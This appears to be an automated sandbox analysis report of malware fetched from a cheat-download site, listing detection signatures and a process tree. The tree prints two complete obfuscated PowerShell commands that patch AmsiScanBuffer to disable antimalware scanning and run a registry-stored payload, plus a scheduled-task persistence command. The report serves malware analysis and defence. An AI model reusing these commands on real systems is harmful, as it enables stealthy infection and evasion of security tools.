Analysis
-
max time kernel
240s -
max time network
301s -
platform
windows10-1703_x64 -
resource
win10-20230220-en -
resource tags
-
submitted
10-06-2023 15:13
General
-
Target
http://cheats4pro.com/download
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 21 IoCs
-
Blocklisted process makes network request 7 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 6 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 7 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 1 IoCs
-
Drops file in Windows directory 6 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 16 IoCs
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 11 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{7104bdeb-aedf-44f9-8af1-a59cc6a87d74}2⤵
- Suspicious behavior: EnumeratesProcesses
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:hEKvxPWJPiAM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vQxoYKQFzJwtAy,[Parameter(Position=1)][Type]$tBrhAAdhmX)$PVqSZZLBjhM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'efl'+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+'e'+''+'m'+''+'o'+''+'r'+''+'y'+'Mo'+[Char](100)+''+'u'+''+'l'+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+'D'+'e'+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'T'+[Char](121)+''+'p'+''+[Char](101)+'','C'+[Char](108)+''+'a'+'s'+[Char](115)+''+','+''+[Char](80)+'u'+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+'S'+'e'+''+[Char](97)+'l'+'e'+''+[Char](100)+','+'A'+''+'n'+''+[Char](115)+''+[Char](105)+'Cl'+[Char](97)+''+[Char](115)+''+[Char](115)+',A'+[Char](117)+''+'t'+''+[Char](111)+'C'+[Char](108)+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$PVqSZZLBjhM.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+'me'+','+'Hi'+[Char](100)+''+'e'+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+'Pub'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$vQxoYKQFzJwtAy).SetImplementationFlags(''+[Char](82)+''+'u'+'nt'+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+'ed');$PVqSZZLBjhM.DefineMethod('I'+'n'+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+','+'H'+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+'ySig'+[Char](44)+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+''+[Char](108)+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+'rt'+[Char](117)+'a'+'l'+'',$tBrhAAdhmX,$vQxoYKQFzJwtAy).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+'g'+'e'+[Char](100)+'');Write-Output $PVqSZZLBjhM.CreateType();}$tRzxqZsDSMsxp=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+'t'+'e'+'m'+'.'+[Char](100)+'ll')}).GetType('M'+'i'+'cr'+[Char](111)+''+[Char](115)+'o'+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+'f'+[Char](101)+''+[Char](116)+''+'R'+''+[Char](122)+'x'+[Char](113)+''+'Z'+''+[Char](115)+''+[Char](68)+''+'S'+''+[Char](77)+''+[Char](115)+'x'+[Char](112)+'');$VeCNHFTlSFFXsv=$tRzxqZsDSMsxp.GetMethod('V'+[Char](101)+''+'C'+''+[Char](78)+''+'H'+''+'F'+''+[Char](84)+'l'+[Char](83)+''+[Char](70)+''+[Char](70)+''+'X'+''+'s'+''+[Char](118)+'',[Reflection.BindingFlags]''+[Char](80)+'ubl'+'i'+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+'a'+'t'+[Char](105)+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$UBopBypbZQUGlHycSZp=hEKvxPWJPiAM @([String])([IntPtr]);$agNovyoWjEJayvvhFBuEBw=hEKvxPWJPiAM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LtyMglKPWyB=$tRzxqZsDSMsxp.GetMethod(''+'G'+'e'+'t'+''+[Char](77)+'o'+[Char](100)+''+'u'+''+[Char](108)+'e'+[Char](72)+'an'+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+'n'+'el'+[Char](51)+''+[Char](50)+'.'+[Char](100)+''+[Char](108)+'l')));$joBgPTLLxocTwX=$VeCNHFTlSFFXsv.Invoke($Null,@([Object]$LtyMglKPWyB,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$FacZzsPXLZyiuFkTi=$VeCNHFTlSFFXsv.Invoke($Null,@([Object]$LtyMglKPWyB,[Object]('V'+[Char](105)+''+'r'+'tu'+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$FfmDeOh=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($joBgPTLLxocTwX,$UBopBypbZQUGlHycSZp).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+'i'+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$tLBuLGpGLMUKJnRgX=$VeCNHFTlSFFXsv.Invoke($Null,@([Object]$FfmDeOh,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'iS'+[Char](99)+''+'a'+''+'n'+'B'+'u'+''+[Char](102)+''+'f'+''+[Char](101)+''+'r'+'')));$gkqJpJxHKv=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FacZzsPXLZyiuFkTi,$agNovyoWjEJayvvhFBuEBw).Invoke($tLBuLGpGLMUKJnRgX,[uint32]8,4,[ref]$gkqJpJxHKv);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$tLBuLGpGLMUKJnRgX,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FacZzsPXLZyiuFkTi,$agNovyoWjEJayvvhFBuEBw).Invoke($tLBuLGpGLMUKJnRgX,[uint32]8,0x20,[ref]$gkqJpJxHKv);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+'d'+''+'i'+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+'a'+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:jBNbEkesqqbs{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$XRjZekbVxGWbDT,[Parameter(Position=1)][Type]$YGXvJFHelt)$NTDdhVYOrbZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+[Char](102)+''+'l'+'ecte'+'d'+''+'D'+'e'+[Char](108)+'eg'+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+'Me'+'m'+''+'o'+'r'+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+'t'+'e'+''+[Char](84)+''+[Char](121)+'pe',''+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+'S'+'e'+[Char](97)+'l'+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+''+[Char](105)+''+[Char](67)+'l'+[Char](97)+''+'s'+'s'+[Char](44)+'A'+[Char](117)+''+'t'+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$NTDdhVYOrbZ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+'e'+''+'c'+''+[Char](105)+''+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+',Hi'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$XRjZekbVxGWbDT).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+'a'+'g'+''+[Char](101)+''+[Char](100)+'');$NTDdhVYOrbZ.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+','+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+'S'+''+'i'+'g'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'al',$YGXvJFHelt,$XRjZekbVxGWbDT).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+'d');Write-Output $NTDdhVYOrbZ.CreateType();}$zKxUJWSbGMVhy=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+'e'+'m'+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'c'+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+'i'+''+'n'+'3'+[Char](50)+''+'.'+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](122)+''+[Char](75)+'x'+[Char](85)+''+[Char](74)+'W'+[Char](83)+''+[Char](98)+'G'+[Char](77)+''+[Char](86)+''+[Char](104)+''+'y'+'');$NSKzzRmVyQjpir=$zKxUJWSbGMVhy.GetMethod(''+[Char](78)+''+[Char](83)+'K'+[Char](122)+'z'+'R'+'m'+[Char](86)+''+'y'+''+[Char](81)+''+[Char](106)+''+[Char](112)+''+[Char](105)+''+[Char](114)+'',[Reflection.BindingFlags]''+'P'+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+''+[Char](44)+'St'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$pOzmeibgMwkdOdzvZsR=jBNbEkesqqbs @([String])([IntPtr]);$bKQGtKMBplKDjOeBwqnQBS=jBNbEkesqqbs @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$NWfTBNRoUQr=$zKxUJWSbGMVhy.GetMethod(''+'G'+''+[Char](101)+'t'+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+'n'+[Char](101)+''+'l'+''+[Char](51)+''+'2'+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$wLGgLffERTKoji=$NSKzzRmVyQjpir.Invoke($Null,@([Object]$NWfTBNRoUQr,[Object](''+'L'+'o'+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+'b'+'r'+'a'+''+[Char](114)+''+[Char](121)+'A')));$gAaKKGziYAQBwzFVP=$NSKzzRmVyQjpir.Invoke($Null,@([Object]$NWfTBNRoUQr,[Object](''+[Char](86)+''+[Char](105)+'r'+'t'+''+'u'+''+'a'+'lP'+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$qYEWKNR=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wLGgLffERTKoji,$pOzmeibgMwkdOdzvZsR).Invoke('a'+'m'+''+'s'+''+[Char](105)+''+'.'+''+'d'+'ll');$bMnikoQCHsScAnqsB=$NSKzzRmVyQjpir.Invoke($Null,@([Object]$qYEWKNR,[Object](''+[Char](65)+''+'m'+'s'+'i'+'S'+[Char](99)+''+[Char](97)+''+[Char](110)+'B'+[Char](117)+'f'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$OZZqDOiBeD=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gAaKKGziYAQBwzFVP,$bKQGtKMBplKDjOeBwqnQBS).Invoke($bMnikoQCHsScAnqsB,[uint32]8,4,[ref]$OZZqDOiBeD);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$bMnikoQCHsScAnqsB,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gAaKKGziYAQBwzFVP,$bKQGtKMBplKDjOeBwqnQBS).Invoke($bMnikoQCHsScAnqsB,[uint32]8,0x20,[ref]$OZZqDOiBeD);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+''+[Char](105)+'al'+'e'+''+[Char](114)+'s'+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeC:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
- Drops file in System32 directory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" http://cheats4pro.com/download2⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0x44,0xd8,0x7ff8849a9758,0x7ff8849a9768,0x7ff8849a97783⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1840 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1616 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:23⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1680 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2736 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2756 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4352 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4696 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3212 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4884 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5380 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3432 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4392 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5152 --field-trial-handle=1752,i,1354681671977625681,11482553444809411658,131072 /prefetch:13⤵
-
